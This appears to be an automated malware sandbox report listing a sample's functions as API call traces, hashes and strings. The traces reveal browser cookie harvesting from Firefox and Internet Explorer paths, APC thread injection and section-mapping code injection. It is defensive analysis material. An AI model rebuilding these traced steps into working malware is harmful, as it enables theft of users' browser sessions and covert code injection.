  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
